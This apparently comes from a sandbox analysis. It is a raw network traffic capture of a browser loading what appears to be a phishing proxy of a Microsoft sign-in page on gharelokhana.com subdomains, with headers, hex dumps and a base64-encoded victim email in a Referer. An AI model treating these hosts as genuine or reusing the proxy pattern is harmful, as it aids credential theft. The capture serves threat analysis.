                                                                                                                                                                                                2024-12-05 07:24:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                37192.168.2.849807164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:57 UTC553OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:57 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:57 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                x-ms-request-id: 8f25bc91-001e-0057-738c-4652c8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072457Z-15d6f6465c8jqpbxhC1DUSr4uw00000000yg00000000s4he
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:57 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                                                                                                                                                                                Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                                                                                                                                                                                2024-12-05 07:24:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                38192.168.2.849806164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:57 UTC825OUTGET /sbo.co.at/winauth/ssoprobe?client-request-id=8d97587d-1931-4a24-9948-0d928dffd68c&_=1733383491884 HTTP/1.1
                                                                                                                                                                                                Host: 5088df79-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                39192.168.2.849814164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:58 UTC540OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:59 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:59 GMT
                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                                                                                                                                                etag: 0x8D8731230C851A6
                                                                                                                                                                                                x-ms-request-id: 7c4a7895-801e-0052-0bd0-44c801000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072459Z-15b54885d96pvbqdhC1FRApzxc00000007qg00000000sz4c
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:59 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                                                                                                                                                                                Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                                                                                                                                                                                2024-12-05 07:24:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                40192.168.2.849815164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:59 UTC1421OUTPOST /common/instrumentation/dssostatus HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Content-Length: 67
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                hpgrequestid: 5890c406-d28b-4804-bcef-ec3fee952c00
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                client-request-id: 8d97587d-1931-4a24-9948-0d928dffd68c
                                                                                                                                                                                                canary: PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeRp4T5fXLKQsTUPeiP3ixrddrqn9LOGHgpYKBDzjwiWG2gNtPKrBhXFUh0LLz7kBnYL_XcJvfsnwi6LVn9h5tllDazAvrd6evpc7CMFESI1OLNxZEnSnXpRJq2aUQb2_4uUrKVZy-Nw02rMgYO-_52BZitVOMniMlUbQkd2uMeIClr9a15oi0pdffXQE5ZhusrRmzXeEROCetZaogHYD1tCAA
                                                                                                                                                                                                Content-type: application/json; charset=UTF-8
                                                                                                                                                                                                hpgid: 1104
                                                                                                                                                                                                Accept: application/json
                                                                                                                                                                                                hpgact: 2101
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                2024-12-05 07:24:59 UTC67OUTData Raw: 7b 22 72 65 73 75 6c 74 43 6f 64 65 22 3a 32 2c 22 73 73 6f 44 65 6c 61 79 22 3a 30 2c 22 6c 6f 67 22 3a 22 50 72 6f 62 65 20 69 6d 61 67 65 20 65 72 72 6f 72 20 65 76 65 6e 74 20 66 69 72 65 64 22 7d
                                                                                                                                                                                                Data Ascii: {"resultCode":2,"ssoDelay":0,"log":"Probe image error event fired"}
                                                                                                                                                                                                2024-12-05 07:25:00 UTC923INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:00 GMT
                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: no-store, no-cache
                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                access-control-allow-origin: https://5088df79-5bf3911d.gharelokhana.com/
                                                                                                                                                                                                access-control-allow-credentials: true
                                                                                                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                client-request-id: 8d97587d-1931-4a24-9948-0d928dffd68c
                                                                                                                                                                                                x-ms-request-id: 51870b13-b3be-44dc-96d6-594acb8dec00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                2024-12-05 07:25:00 UTC272INData Raw: 31 30 39 0d 0a 7b 22 61 70 69 43 61 6e 61 72 79 22 3a 22 50 41 51 41 42 44 67 45 41 41 41 44 57 36 6a 6c 33 31 6d 42 33 54 37 75 67 72 57 54 54 38 70 46 65 70 64 6a 73 43 43 78 73 49 54 50 6b 65 38 58 77 54 78 53 4f 56 61 39 78 7a 55 30 49 65 43 58 75 56 51 5f 4c 49 46 4f 45 4e 58 71 4c 6b 6f 6b 43 39 71 37 50 4c 4a 46 70 6f 4b 30 50 72 47 50 36 35 36 49 39 42 65 57 79 32 59 6b 68 5f 75 73 6a 44 73 4d 67 51 6b 76 42 5f 71 70 77 67 61 43 43 5f 74 73 36 6f 49 58 79 58 4f 58 65 5a 6c 78 75 69 68 48 6e 51 46 66 63 75 49 4a 35 6a 38 5a 49 62 77 59 56 32 4a 63 30 51 32 6e 64 77 4b 6b 35 6a 30 4a 47 67 37 63 53 4e 45 64 36 73 49 4b 4c 73 55 68 66 77 67 31 55 45 46 6e 59 5f 76 38 6a 48 59 72 4c 33 56 2d 4d 58 34 69 53 72 4f 37 74 63 7a 61 73 43 6a 4f 57 63 4b 74
                                                                                                                                                                                                Data Ascii: 109{"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFepdjsCCxsITPke8XwTxSOVa9xzU0IeCXuVQ_LIFOENXqLkokC9q7PLJFpoK0PrGP656I9BeWy2Ykh_usjDsMgQkvB_qpwgaCC_ts6oIXyXOXeZlxuihHnQFfcuIJ5j8ZIbwYV2Jc0Q2ndwKk5j0JGg7cSNEd6sIKLsUhfwg1UEFnY_v8jHYrL3V-MX4iSrO7tczasCjOWcKt
                                                                                                                                                                                                2024-12-05 07:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                41192.168.2.849817164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:59 UTC766OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:25:00 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:00 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 35203
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                                                                                                                                                                etag: 0x8DCBD5317AEB807
                                                                                                                                                                                                x-ms-request-id: 8dc1112b-701e-0010-5da0-463993000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072500Z-15d6f6465c8bvxqchC1DUSzerg00000000r000000000h71m
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:25:00 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                                                                                                                                                                Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                                                                                                                                                                2024-12-05 07:25:00 UTC16384INData Raw: 5a 27 f8 ef 29 66 ec 36 5f c0 bf 7b cf db e7 cb d6 5e f3 39 39 c4 7e d8 a4 3f 2f f0 df f6 31 25 da 94 d3 6b 52 82 1f fb eb f5 38 01 c5 5e 3c 7f 81 ff be 78 d1 df a4 3f 3f 5c dc 9f 2f 4f c1 50 38 83 3f 27 3f 9c e2 bf 27 a7 0c 6c bf 20 e0 31 36 05 7f 3a 0c ed 50 d1 d3 dd ce 26 fd 39 26 e8 0f dd 26 95 6d b6 f0 df 36 d7 d8 7d 71 b1 4d a3 6e 7f 8d a8 34 0f af e3 f9 e5 eb 60 18 25 4c c7 0e 12 cf 64 9c 46 79 11 cf e9 d1 06 ce ee 3a d9 1f e2 22 89 38 63 87 29 dd f9 fd 86 81 f5 0f 1a c3 1d f7 a8 90 94 f1 fc a7 e0 16 94 3d fa 49 a2 98 7e 0d d0 42 9f 0f 5a 07 94 3a 0c 0f 88 0d fb 1d 90 fd a0 60 00 7b 67 a1 94 ab 54 0a b7 32 f4 1e 6e 6e ce bd 2f b8 bd 2b 09 06 15 63 6e 1f 58 7c 36 02 99 80 ef 21 6c e5 97 f1 e2 43 7a 19 e1 72 f3 fb b8 db a5 1e 15 1d 70 e1 cd 96 37 6f
                                                                                                                                                                                                Data Ascii: Z')f6_{^99~?/1%kR8^<x??\/OP8?'?'l 16:P&9&&m6}qMn4`%LdFy:"8c)=I~BZ:`{gT2nn/+cnX|6!lCzrp7o
                                                                                                                                                                                                2024-12-05 07:25:00 UTC3241INData Raw: b2 a0 e0 8b 8b 70 03 1f 2f 3b af cc 59 7e f0 78 ef 41 c4 51 45 bf fd 06 54 22 09 3f 2c e1 74 75 58 56 49 f7 ba 9f 47 6d 03 0a 5a 85 8d 63 9b 31 92 72 8e a4 a2 fd 7a db c3 9c d7 fe d6 74 7a b2 ee f6 eb 69 89 47 95 d2 71 e6 19 2a 1e 34 14 88 bf 04 4f 60 7a 80 b3 a1 cc ef d6 a6 f3 a8 f0 c8 cb b0 45 86 d4 64 ff 46 96 bb 3b 19 c7 74 03 9a bb c8 a2 95 77 76 ba 0c f8 c6 5d 7e 3d 0a f6 86 ec 70 f3 96 3d 0a ef 1d 6d 76 38 74 63 36 64 ea f5 13 7a 9d 58 8f a6 34 51 c4 c5 92 a2 37 7a 3f f6 ca ea 70 45 15 10 94 a9 aa e2 1c 6d ab f1 97 6a eb da a8 37 ab b5 2a 53 4f 08 e1 8d 5a bb c9 c2 1b f5 72 b9 89 e1 f4 32 7c 6e b0 df 0b bc 13 c0 af 5a 2c 84 65 2e 53 c6 16 fa 75 52 d7 2b 22 f4 1a c5 54 f5 30 a9 5e 69 52 90 5e 6f ab 68 7b c8 ea e9 3a da 6c d1 55 f6 2f a1 35 83 0c c2
                                                                                                                                                                                                Data Ascii: p/;Y~xAQET"?,tuXVIGmZc1rztziGq*4O`zEdF;twv]~=p=mv8tc6dzX4Q7z?pEmj7*SOZr2|nZ,e.SuR+"T0^iR^oh{:lU/5


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                42192.168.2.849816164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:59 UTC805OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:25:00 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:00 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F49ED96E0
                                                                                                                                                                                                x-ms-request-id: f130dc73-a01e-0037-52d0-446645000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072500Z-15b54885d96nhnjlhC1FRAhha80000000840000000008n7q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:25:00 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                                                                                                                                                                                Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                                                                                                                                                                                2024-12-05 07:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                43192.168.2.849818164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:00 UTC731OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
